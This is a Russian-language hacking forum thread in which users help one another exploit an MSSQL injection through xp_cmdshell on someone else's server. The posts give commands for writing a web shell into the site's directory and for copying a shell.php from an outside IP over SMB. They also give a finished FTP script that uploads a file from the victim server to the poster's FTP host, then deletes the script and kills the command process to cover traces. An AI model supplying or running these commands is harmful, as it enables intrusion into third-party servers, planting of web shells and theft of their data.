Доброго времени суток, уважаемые.

Подскажите, есть ли возможность через CMD скачать файл с интернета и сохранить его локально. Т.е. задача такова: имея MSSQL injection и возможность воспользоваться


;exec+master..xp_cmdshell+'bla bla bla';--


вместо bla bla bla использовать команду тоторая скачала бы шелл с моего сервера и сохранила в указанное место на уязвимый сервер.

Спасибо за ответы

jangle

про закачку файлов ничего сказать не могу, но есть вариант записать данные в файл, это поможет залить хоть форму загрузки файлов

cmd> echo "тут твой текст" > C:\папка_в_htdocs_\твойфайл

как и в никсах..

как вариант.

НО ...

к сожалению при повторном выполнении команды текст переписывается, а для записи в файл формы нужно будет сделать несколько строк, т.к. SQL INJ не позволяет в моем данном случае вписать длинный текст, кроме того фильтрация некоторых символов которые используются в том же html все таки есть.

к стати, для того что бы строки добавлялись в файл а не переписывались можно использовать


cmd> echo "тут твой текст"
>>
C:\папка_в_htdocs_\твойфайл


В общем, буду экспериментировать и ОГРОМНЕШЕЕ СПАСИБО за наводочку - буду думать)

copy \\123.123.123.123\my_shared_dir\filename.txt c:\site\shell.php

copy \\123.123.123.123\my_shared_dir\filename.txt c:\site\shell.php


Этот способ не подходит т.к. копировать можно с рашаренного IP по NetBIOS

С сайта же нет возможности (если я не ошибаюсь)

Пробую локально


copy \\my_site.ru\abc.html.php c:\shell.php


Пишет


Отказано в доступе.

Этот способ я пробовал, но что- то не так. Не получилось

Реализовал примерно так (может кому надо будет. Тут заливка C:\1.txt с уязвимого сервера на мой FTP)


echo+off
echo+open+ftp.site.com>>c:\asd.txt
echo+ftp_user>>c:\asd.txt
echo+ftp_password>>c:\asd.txt
echo+mput+C:\1.txt>>c:\asd.txt
echo+quit>>c:\asd.txt
ftp+-i+-s:c:\asd.txt
del+/Q+/F+c:\asd.txt
tskill+CMD


Вообщем, направление понятно

Konqi, M_script, Nightmarе - БЛАГОДАРЮ!

Тема закрыта